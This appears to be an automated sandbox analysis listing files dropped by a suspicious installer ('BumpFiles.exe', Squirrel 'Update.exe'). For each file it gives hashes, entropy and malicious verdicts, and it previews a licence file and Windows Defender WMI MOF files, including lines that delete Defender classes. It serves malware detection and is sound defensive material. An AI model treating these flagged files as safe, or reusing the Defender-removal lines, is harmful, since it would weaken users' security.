                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):403816
                                                                  Entropy (8bit):6.1451106536127735
                                                                  Encrypted:false
                                                                  SSDEEP:6144:z9eW9BpN1rKvfwOlWQb1MfMp7ZFfyjCrplIz5qyAlhAXnWPkzfo:zDKv4OlWQpMA7Z0Cr/e89QnWszfo
                                                                  MD5:FBAA9986931D1ADEDA07A6EF8F04AB6D
                                                                  SHA1:5FB959351940EB94EEF9D8E21D95436B77FEB9A2
                                                                  SHA-256:3B96D206B1BF06532440E2DD91B615A6CC8DD21561C252449F3B76FC254E11DF
                                                                  SHA-512:A88A56E30BEBF91CDB1382F46E2D095CBD20CA6ACDFBEF1998602AB7C744E6DECB6D80885CCE3CE1F97EBCBBDC5F90A6B192D8BE9C08DD4A2FC95F10AB2CC102
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):25936
                                                                  Entropy (8bit):4.328275985676387
                                                                  Encrypted:false
                                                                  SSDEEP:192:9+DWgAHWglQBEKLO0cCroDBQABJFI6eYIN5vCX01k9z3AzfSXDlG6P:cWgAHWtBEJlDBRJeWUJCR9zUwDM6P
                                                                  MD5:4A8B58C88DF1C607A9DF21EE390CA8F8
                                                                  SHA1:18B995CA90D74D34975F9DF8E8611F35E7B94E9D
                                                                  SHA-256:1A90C01C3FD40E5CEE77F626BF9883B5D276132252E28EE4B6C2C02D9CD30E4C
                                                                  SHA-512:1ECCD6FB016C7E43FBE63120A2A43135B17453AF428658E11EFD69F753FEE5A5F227202144CE85840388E138D392F0A528450B37DE23EFE902CC467A5CD4F1DA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):587096
                                                                  Entropy (8bit):5.955146470563534
                                                                  Encrypted:false
                                                                  SSDEEP:6144:UoSVOVSccnel+Z/smH98qn3xVPNCqdeAB5l6Hv7YPdr5/NJSFiimiTVVmVVV8VVp:ULOVSpu+Viq3xnJdtn6jUFYNN
                                                                  MD5:2776A2B1C9D82F3FEBAA8CA1F5544992
                                                                  SHA1:28620B6498EEFA4E411686FEAC1C0E03D66B661D
                                                                  SHA-256:D1F81D7C43B522E39F0FD14E1C25F97E7894CEBBE1F43320CBB66BE1528A7A72
                                                                  SHA-512:2FBCA83415F5E927B38DBF7064CAAE1CD67EC2ACBA6C00AEB3520F9C8BC3B9DE46329CB57B2D1D9DC7CB33BD89766E6C8C3DC3C1FC6B3DAA885CB50FE64C5E2B
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:ASCII text, with very long lines (467), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1091
                                                                  Entropy (8bit):4.900567214358779
                                                                  Encrypted:false
                                                                  SSDEEP:24:8uSJLsnMRsAvARsADXWBDk44IuNhbgU0E+4HQk1LpsLtbY:89LsnMRsgARsqXWBDB4Tvr06H319ou
                                                                  MD5:314CE81BED1547B8FA40F405F4C8B9FC
                                                                  SHA1:6A1A717B275B90BA77A43EF77FCDEDBC7E6F7CE2
                                                                  SHA-256:00D799DC04FBDF92BC39218C22723C61C3204A82B1FC418E6AEA65E6ED111CE8
                                                                  SHA-512:143A0D92659BB088F2282BDB14F465D58EA9E0E57D261741CC9AC7B507BE730F4B0A62E9A9BF0B73BF19FDF6F44F2977E2C77875E28AC30E461155BDDB59A047
                                                                  Malicious:false
                                                                  Preview:Files originating with or related to Casablanca v2.6.0, a "Microsoft project for cloud-based client-server communication in native code using a modern asynchronous C++ API design. This project aims to help C++ developers connect to and interact with services." See https://github.com/Microsoft/cpprestsdk. This material is licensed under the terms of the Apache Software License v2.0 (see https://github.com/Microsoft/cpprestsdk/blob/master/license.txt), which state: ==++== Copyright (c) Microsoft Corporation. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):142
                                                                  Entropy (8bit):6.55447018279355
                                                                  Encrypted:false
                                                                  SSDEEP:3:DfVjzD2ZzXgE4dXC/FiYvyfgaPDlZqLDpVYngGbu/6Ry0s9rYdn:hnDEgRdSZEg8YDp1ERy0OAn
                                                                  MD5:57A37BD0840D0745A9481BCC25B5A792
                                                                  SHA1:E8B7C744981C0713DE5EBB308897EFCBD374FD11
                                                                  SHA-256:E2B2371F95D8D9CBFCA301AFF3441466E30453BBD37A42FA17DAF4D85AA7E627
                                                                  SHA-512:08AFA751874B49FB20ADBEC0C824609DAE0DECD6E747471EF8CB19FAE299A65D21ACC02185560669ED9E36CD74E2E4372B61E52EEF34D5785E9BBA3DC8FD431B
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):2560
                                                                  Entropy (8bit):3.2580418248791343
                                                                  Encrypted:false
                                                                  SSDEEP:24:eH1GSp85gpXsFCZIN/at1IyBIZW0sTf5cnaw7ScNffz745U35WWdPfPN3Tc:ypK2BZ+W1I8IZWPTf5EdHffA5K5Ww13g
                                                                  MD5:EE08DF3A08F49B9A7239F0DE796E5DD0
                                                                  SHA1:461A532C71E6C20FB529F340CDF89DB4845200AF
                                                                  SHA-256:5959174D18270B856CF01B69223623E231AEF539F71B20336E0BE764F4C632F5
                                                                  SHA-512:7E6274FB38113EF69B132C5687EC4E08FFD09A4C1CA85B82441470D20AABBB55814E97EF8EE6DFA08A377719FB71ABA6A94F1217554C3463173AF12F93038222
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50688
                                                                  Entropy (8bit):3.394595207496583
                                                                  Encrypted:false
                                                                  SSDEEP:768:QJbyt33c7EhrdTTm147vXahEzhEthEGQRQwhEfSm:QJbytHu6rdd7vM+4Ivm
                                                                  MD5:4CFEF0FE4901B062F4B169B97F8CFD31
                                                                  SHA1:3ABE261FA1E8625FE3155B0D4B98D0D5903E1E1C
                                                                  SHA-256:5A89EBF5211FE4E51ED4D5D8FE1FEEC591A67F2F1632C6C0873CB44028386F43
                                                                  SHA-512:B1D8D65B6E781019618119F71500EC082018E11DF5562C878E34E1EC54FEF770F6B9F095A10D22B550FE137F1177057B507A1845048BA170EC762AAFB21D52CA
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):43520
                                                                  Entropy (8bit):3.4967857595832523
                                                                  Encrypted:false
                                                                  SSDEEP:384:ZtOioFEr4H1O/Dtkby/g1mwhqfB9hy0VkkWoBFH1ANl8CWupBW4:MBHI//1ANl8yp5
                                                                  MD5:FF86B38C73EED57883F04E1E61C3A213
                                                                  SHA1:6DD75F604393D70288AA1E28392AB83701B67650
                                                                  SHA-256:A7303F3077D7890C7CB889C7DD4A913BB0E5AB94E8DD190F258C85BF0A81AC28
                                                                  SHA-512:AAD695468C28F5E02DF5171294151BFA3A96D97203661C7278B4F2D37C167D8A6DE48A6AE9E50BCA6083A5E968497FEFC7526B2FCAB1A1F2396421A187CA798E
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8704
                                                                  Entropy (8bit):3.57992330655092
                                                                  Encrypted:false
                                                                  SSDEEP:192:WWFmd28sT8KF7Y1+z7YNiuErC0IQ3obWNfpW7:zYd28sT1F7Y1+z7YNiuErC0IQ3YWNfp0
                                                                  MD5:E38287B098C2A55EE69A224BE73C93E8
                                                                  SHA1:0422464BBDA490FBC74896494318B5A141CF2710
                                                                  SHA-256:B61780AE34673BF797B85387036E01A03DB9F3D949BC23AD87EFD0A1D7EBA03E
                                                                  SHA-512:9126D8CDA5E1E898D443B9A6B8757F0FC205E599DE84241C0F0418857FA0D30DE1885AD5D04E539476500C15C6BEB4E2AB438564B7A6DDD3E7A898621059C6C6
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):7680
                                                                  Entropy (8bit):3.529446079422097
                                                                  Encrypted:false
                                                                  SSDEEP:96:ZqJtrkDSJ6Spy99V9KzEcEKLqmqYgAMkL1J+8PUnW4+EW6brWwg:ZqJOvDAzzgYR7AW4TW6brWD
                                                                  MD5:D186BEDACDCCA084DA65C65D598EBCA8
                                                                  SHA1:3C48928EC8FE199545C0AD5ADEE27A5AC61E3D99
                                                                  SHA-256:363B8713FA608B54832C5F78E17331D94F0E888B98A0337467B5B1A5A18E7B75
                                                                  SHA-512:4B1774C4200BCD1161C8B00A9D5FFF11B6FDE35559531A578DA0EE6ED97A255FFF4FFC2B3C1E28DFCCCD2D77E616B92F91749F4BFD2999C105A00809C2D1359E
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):35840
                                                                  Entropy (8bit):3.534239180172005
                                                                  Encrypted:false
                                                                  SSDEEP:768:zFMCgGn67PzUf+YXIurmXuQmMVhjhxpIE:z2CpjZXIVXPiE
                                                                  MD5:3C50201BA7B59C83412E463689D9798B
                                                                  SHA1:A97F6D79D365B72F0AADCF2EA0B77C1FBD0940E3
                                                                  SHA-256:DD449C37F48009C37ADA9339185E8B30A50CC97F17E2979AFBE04B9A40F2B26A
                                                                  SHA-512:32DFF7044961E0254E38D592734F1B2566D4F079DE1611C6866F437F7DA9F2B257A89CA84C46D832B8CCA394866BF60B6203DAC2DD680C11FAC17A2D72BB23EC
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (11632), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):95866
                                                                  Entropy (8bit):3.503699910346522
                                                                  Encrypted:false
                                                                  SSDEEP:768:r7EIEB87ovwzUHfRWKXdxXMJHro8ozUUCaOZ5f5XPu1QcQBQEY46bY4814OT6/5k:rK4GXMa4BXPrY46bY48iOO/2
                                                                  MD5:675269F40380DCD00A2E2144A57F610A
                                                                  SHA1:B663129AD88776319E98519784CE2B21765AB196
                                                                  SHA-256:87E91B7FE6743B8DF9379E109B543D5BF6F41AB16198BB0DAD78D1C249D61B1F
                                                                  SHA-512:0E79DE4580FBC1E44DEB12AF91052125D0860574C4B2CBD9DCFB6F02DA6A568BCD11C34E35EAF403E78F112FC532FE5138C5FE0E5D43348483BD5A72F93DD65D
                                                                  Malicious:false
                                                                  Preview:#pragma autorecover
                                                                  #pragma namespace("\\\\.\\root\\Microsoft\\Windows\\Defender")
                                                                  instance of __namespace{ name="MS_409";};
                                                                  #pragma namespace("\\\\.\\root\\Microsoft\\Windows\\Defender\\MS_409")
                                                                  [Description("This is an abstract class that shows the base status.") : Amended ToSubclass,AMENDMENT, LOCALE("MS_409")]
                                                                  class BaseStatus
                                                                  {
                                                                  };
                                                                  [Description("This is an abstract class that shows the base status.") : Amended ToSubclass,AMENDMENT, LOCALE("MS_409")]
                                                                  class MSFT_MpComputerStatu
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1118
                                                                  Entropy (8bit):3.459513705694916
                                                                  Encrypted:false
                                                                  SSDEEP:24:QXbclTUWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvlR:enjDGwJ3r24RFZC
                                                                  MD5:AFE6664D26D5D05B4568E329BE37D7DE
                                                                  SHA1:2F6FD02E26E9F3A09866F3C106A8C1539B50D46F
                                                                  SHA-256:B6BAC201F1586B4C357521C46421086557A0DF86A022B120B723EB047E450D43
                                                                  SHA-512:8C1AF20BF892C303F8247B6E991A96A59CB0C65AB7E11C630282AA1B091FAEA8B27AA08210249FE2B47FA9488834E82487490581B54B236461FE61CF346F623E
                                                                  Malicious:false
                                                                  Preview:#pragma namespace ( "\\\\.\\root\\Microsoft\\Windows\\Defender\\MS_409")
                                                                  #pragma deleteclass("MSFT_MpComputerStatus",nofail)
                                                                  #pragma deleteclass("MSFT_MpEvent",nofail)
                                                                  #pragma deleteclass("MSFT_MpHeartBeat",nofail)
                                                                  #pragma deleteclass("MSFT_MpPreference",nofail)
                                                                  #pragma deleteclass("MSFT_MpScan",nofail)
                                                                  #pragma deleteclass("MSFT_MpSignature",nofail)
                                                                  #pragma deleteclass("MSFT_MpThreat",nofail)
                                                                  #pragma deleteclass("MSFT_MpThreatCatalog",nofail)
                                                                  #pragma deleteclass("MSFT_MpThreatDetecti
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3072
                                                                  Entropy (8bit):3.3889790046988564
                                                                  Encrypted:false
                                                                  SSDEEP:48:ypY55M0IyyS/kVrx1TIZWqHWq6sffm0/iy5Ww13/:73IakVrvTEWiH5Wwd
                                                                  MD5:C99D5885AAB799E23E6E5498D0D1B07C
                                                                  SHA1:33450BDC3CDA46CEC0AF5467826143C46624E597
                                                                  SHA-256:C789A39DE6F9DF1A85BDB495D7F9955E1F673FBDBC0B77863D4595A4C4DA82F4
                                                                  SHA-512:8E583EBCC5A867E38BBB0A8A9EE40976AE949A130E2C4DB7B7CB82B3E815E3E785E15411BA4AADCF84ABCA8783E02D09FDDBAE736C3F326EC851D1B2193EC3B8
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):685328
                                                                  Entropy (8bit):6.2613956335812
                                                                  Encrypted:false
                                                                  SSDEEP:12288:pRCT1SH7y45rUcOoza9hW+WSAh7Z1a6MLoloKfihqPgwX:pySH7yGUI+WL7ra6MLolrfihqh
                                                                  MD5:113DB043FE13F4635D0A65FDF100CFD3
                                                                  SHA1:1DF847E5E1680669FE0DF779B66942C521B47012
                                                                  SHA-256:716BA8B125E70C4D717262381B3A31203C41442B680651729ADF12059B53123F
                                                                  SHA-512:0B66C78C11DF7FCB8971FDB658D9372E06CC2A0D5AA116864E2D79099E660FB1A9F40368BFE590C6CCE5AA07DA592F89F0327D8EC02467EFBF720860C47BEB16
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):8764801
                                                                  Entropy (8bit):7.999974027044619
                                                                  Encrypted:true
                                                                  SSDEEP:196608:He+u4ln80jwTABJKUiD2iS1+sGRVc3PC3s3Z6oF+nzPZp:HeZ4N80jwG3W2xR2YP6MX43
                                                                  MD5:88EC493F2A48D234120348AEAB6D3808
                                                                  SHA1:3FB458578198B4691B409FFEABB99EDFE3827EAD
                                                                  SHA-256:4086FF865F27274805EEB8DF9504D381AF17582632FFFD02C81245A3119A3F34
                                                                  SHA-512:9A8CF59D76CBDEB0B03525A1D3E2869688F597F2A10751E13815CB827D92F12A7FCFAB0A32932A55386BE3026124BE9CA51FC2DF6A112D3B2E00141BEBA6F5F9
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                  Category:dropped
                                                                  Size (bytes):8764801
                                                                  Entropy (8bit):7.995971570571292
                                                                  Encrypted:true
                                                                  SSDEEP:196608:sL/pb5vj/q8cFmGRouNMASrmNOpzEPbL56gRLDh4eoJx1JG:6h5vD0JRTPux4ZLRoJx1JG
                                                                  MD5:924C6BB2D6985A7BD8D6B0B3AF3D81B7
                                                                  SHA1:FD36D0B778FA1522705BF7FCD350535F1ADE3CA5
                                                                  SHA-256:008B8E5E1286E96A1FA878DA2D6B48A70C62C56359519A90B713DB450F3ECD7F
                                                                  SHA-512:F3677CF016835914A8DEB80A225C27165A8CF135F7F336F6BB897AE26A6C0DD40D96826CEB5E4B4C42040CB5A6490DC9B5B0690948EF1E235ACC632EAF2D1570
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3072
                                                                  Entropy (8bit):3.688226991598996
                                                                  Encrypted:false
                                                                  SSDEEP:24:eH1GSp8zgpXLUCZIN/G15JqZW0Iyc5ArqA5+DScNffzJ2Uh7/5L3guolb9fPN3Tu:ypA2zZ+G1zqZW7PA5afff5TN4x93S
                                                                  MD5:66D970ACC9C33581B9E3152CDF46C707
                                                                  SHA1:7C3ACD65D71B94837B837DFB52C1FC48E8B98F0C
                                                                  SHA-256:36F0DA44D38A45FD585CFC84B03C00185DB00F103A655821B5BD6FCCD88EB426
                                                                  SHA-512:C154E38181825C9F844ECEBAC6213FBA9C2792849097451758FCE11D728763135CA0211BB91BFADA310B2C371D77B25E6BD4CA131AD8E72815543A2F7909DFB2
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):55808
                                                                  Entropy (8bit):3.370538627905652
                                                                  Encrypted:false
                                                                  SSDEEP:384:8ELIoHwex9cxks8ntGfFDD4vlzAQQ+8+jBUJ3P+/npK5sD8XOHKXSXSXuCilXYMY:dLIoHwex9cxMtOkA3+FRpKIl5i
                                                                  MD5:50C3A70FA84C07A424EC3D2834D06523
                                                                  SHA1:4FD26B0566F31172BAC62B839ED5CB62B6625AD5
                                                                  SHA-256:95A2C437329C4C4DF4919152BC90284A90857122E4B9C868C36F103ACC52A028
                                                                  SHA-512:DE9358CE4269187C60F9CFD7E4B913747A403BC2F069C877E220AED02B63AFEC6BA115B4F79C1BBD4AC80DCFBBDBFC1739DDE34983D8DC0A10B027B41142CB91
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):47104
                                                                  Entropy (8bit):3.506031927133505
                                                                  Encrypted:false
                                                                  SSDEEP:384:RXSmktkGpXilFdOUry+KoK2o4XqPA/RDkVQyiQ8oiKEu8+k9Ko8uWJl:E5tVD0DuZl
                                                                  MD5:CE84B2A9F6DF190FA977504B51536808
                                                                  SHA1:08EC7406B12042AD09EE7D3124863A57CE30F197
                                                                  SHA-256:A7224212D1D6FEC1558709633EBB1580CFB6CAB230624F548239A974C7A0D6AF
                                                                  SHA-512:5F68ABC2DB6A92D195D656695A22FC5C01F135263966567227A7771F3ECA4B7690BB5278B49B30E8BD11EE4124D29F943241E0AA5A69B69FB5202DCDD2B80841
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8704
                                                                  Entropy (8bit):3.583197744926803
                                                                  Encrypted:false
                                                                  SSDEEP:192:7HXRd28sT8KNWW+WfjIWe/W9WZWeWW+WfjIWe/WlWkNWSuWOJW:7hd28sT1NWXWkW+W9WZWeWXWkW+WlWk/
                                                                  MD5:5D46933E794A91BFDF12CDA3348BDE8B
                                                                  SHA1:F940EC0F7C8DC00F599D24020C6785D217C8B07F
                                                                  SHA-256:69550BAD9F1CD6BAB05EC9DACD5A105BF2CBD93856217AFD6722F9C62CAB104F
                                                                  SHA-512:CCDC2E8015CC1C97B475A32F7F451C1B78CD1C80CD10E79DB123A30D5B8BA120F0D5CD68DC25DD19A09834553D072E56A4AC406AEC4C73B7DC9E199D8309C6A1
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):8192
                                                                  Entropy (8bit):3.658761008984688
                                                                  Encrypted:false
                                                                  SSDEEP:96:82qJtEfs2mSpy99V9KzEcEKLqBrEhMABGTzG1BNB9SBJWp+CWMeO4x9:82qJaPmDAzzDgBJWpFWMeT9
                                                                  MD5:353FFC1C5EAF0A900FABCAAB968ED76E
                                                                  SHA1:ED9F2EDA723C924D2F22F9B1F3EDF0A0B522A02B
                                                                  SHA-256:36B16B933C7E5EB93A2AD8D11F38C7793B60F09472EC9664C17E786C7361551E
                                                                  SHA-512:A28C3EC8A503BB133B9EFA158D6454CB6A39A3A4F4E98C13A19901D4DE1A86153AC081B5AF8B9CF01D45A33A8946A07CB1DB2081D89D2EB1A431416DA171542A
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):3.5026787417351337
                                                                  Encrypted:false
                                                                  SSDEEP:384:0R6xvTgGhZ88YmErAJwj18ChH1WgQLP89oH10fBrLjDWQWyg:qogaHYtAfc1akI1aLPg
                                                                  MD5:6817F98F4E0D412F0313C417100B89A6
                                                                  SHA1:4B1D40AE23935F47BE28E45827404C008481BE5B
                                                                  SHA-256:BA423B0529EDD4AC44F0A8FA2AABB28A3B422EEF351C3E0C06E44544350683CC
                                                                  SHA-512:07034BA97D2CF7C7334E72F998529A40C6AFB0B94881DA107ABDAB09753A8F7B575451AB06B0C6BC52BBE230B4B14F6BDA3612B9B65C7E1C0027DAD53CC34BC5
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with very long lines (9654), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):103370
                                                                  Entropy (8bit):3.5117432836886926
                                                                  Encrypted:false
                                                                  SSDEEP:1536:0UijGqj13Lh495o14sJ5nGY4w2Y4CZnm//:WGqjFC95oqkVZk
                                                                  MD5:EAC0C55B5DDE369B236E10E36FAFECA5
                                                                  SHA1:1E19CE7B3E89460ABE9552E6B7EB3CECE169C67F
                                                                  SHA-256:71FB552585CD8C9496BF3127A6D032E6C76DFCF6C5A141B546A735F214905CCE
                                                                  SHA-512:B7406D4E02D65248DE901C6FD4CACF53A37FC932188B40FEB564937DA777296CBE22899893BCB00C56DCB5EC2D9F7966C1506BC76A2490AFD15CFA54B3F15C7C
                                                                  Malicious:false
                                                                  Preview:#pragma autorecover
                                                                  #pragma namespace("\\\\.\\root\\Microsoft\\Windows\\Defender")
                                                                  instance of __namespace{ name="MS_416";};
                                                                  #pragma namespace("\\\\.\\root\\Microsoft\\Windows\\Defender\\MS_416")
                                                                  [Description("Esta é uma classe abstrata que mostra o status base.") : Amended ToSubclass,AMENDMENT, LOCALE("MS_416")]
                                                                  class BaseStatus
                                                                  {
                                                                  };
                                                                  [Description("Esta é uma classe abstrata que mostra o status base.") : Amended ToSubclass,AMENDMENT, LOCALE("MS_416")]
                                                                  class MSFT_MpComputerStatus
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1118
                                                                  Entropy (8bit):3.459513705694916
                                                                  Encrypted:false
                                                                  SSDEEP:24:QXbclK2UWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvT:e1TjDGwJ3r24RFZC
                                                                  MD5:606AA235BE1B21761E91A75475BB4CCA
                                                                  SHA1:437D21FC2BDD385A6540428B2B99D45191A38BB2
                                                                  SHA-256:9437B33FEDF880B480913612671D83AA56D7753B76D5E728DD73B9205E8A9B98
                                                                  SHA-512:3DAB122B4C4E868E687888579C0C3D3EAB561BA9F560B9A01ECC705FC5FD41B52EE42BC749382C122BA3DAA9BC203B1231DCC948654C36DC2F9B0D47A62AD6BF
                                                                  Malicious:false
                                                                  Preview:#pragma namespace ( "\\\\.\\root\\Microsoft\\Windows\\Defender\\MS_416") #pragma deleteclass("MSFT_MpComputerStatus",nofail) #pragma deleteclass("MSFT_MpEvent",nofail) #pragma deleteclass("MSFT_MpHeartBeat",nofail) #pragma deleteclass("MSFT_MpPreference",nofail) #pragma deleteclass("MSFT_MpScan",nofail) #pragma deleteclass("MSFT_MpSignature",nofail) #pragma deleteclass("MSFT_MpThreat",nofail) #pragma deleteclass("MSFT_MpThreatCatalog",nofail) #pragma deleteclass("MSFT_MpThreatDetecti
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):3584
                                                                  Entropy (8bit):3.7438394010156575
                                                                  Encrypted:false
                                                                  SSDEEP:48:ypr95MHUR8U6NFc4qy/F1rqZWd9hffmb/i7N4x93S:q0oyW9urCWCI4xs
                                                                  MD5:3464E072F66FFE6CF4DF06CF9C11D331
                                                                  SHA1:197566FD1A73D5BE8D3A720A51DB02329C6DFC54
                                                                  SHA-256:EF12115438168F6CFD797E991A7BE561812719EB31127EBC8E0B418726452520
                                                                  SHA-512:1FBC4432610257E7A5A152E07EA905EEF6DF0F15558231C01AA4C0E89A39C9FF6ABF77C8C9644BDB224B47B9E4915DA16CAFD3CC3C58A74F9EC7A9E5C4D9AD2A
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):468312
                                                                  Entropy (8bit):5.621872137435956
                                                                  Encrypted:false
                                                                  SSDEEP:6144:+/fJNDoSCaKgg6OEBCOJzXv5ApNMY0lESLMp+W8j1sl3FIY/VLIVuV3Y0CC7HHmc:+/fDTCzgg6T3ALULE+WNl3yCIBL+
                                                                  MD5:85E67579A416A86D726D4AEC49F0EF87
                                                                  SHA1:2D7D1C1213B09924F926D9C6197A60CC3F617B3C
                                                                  SHA-256:112891EB9C3B06F6B95919E34BDDC607AF76EB9AEAEDE8E3BF3147709F0AE3B4
                                                                  SHA-512:0FB7A0C0A510A4EC9540B5A6EBA94D27BEEB4B9AE7E17DEF1DD3EF095ACAE5E66ED067EFE4A9873EB73969F48EBF29A0B7B042CEFA9C1E2187B41C00F3ED933F
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):196096
                                                                  Entropy (8bit):6.4589375341129225
                                                                  Encrypted:false
                                                                  SSDEEP:3072:GZzaqLh5m21b4n86fZHi8c62bdq32BsWtEGwF4JOAg0FuDTT6E675MU:GZzvhs2Z4n1E7g34XtVYAOfTd0uU
                                                                  MD5:4490642C30F86355647A3154D5A25D7A
                                                                  SHA1:FD368F63A66C554B8E3A493D8B7BC2B834CD17A5
                                                                  SHA-256:77D6C8E668F33DFDA787CBF82BDF8D88F9B66B36F3631BECAE2AE92E9C9E9229
                                                                  SHA-512:6563482F84B9FBFC4D14C677ED4E605BD1F1D0976DFA2B7D0D08CBA850814A5006B314224E9017E6A653CBA61D0B4A4F51FF83AF19824F00AA39DDFAFA6CC81B
                                                                  Malicious:true
                                                                  Process:C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):1899520
                                                                  Entropy (8bit):5.894883178349122
                                                                  Encrypted:false
                                                                  SSDEEP:24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
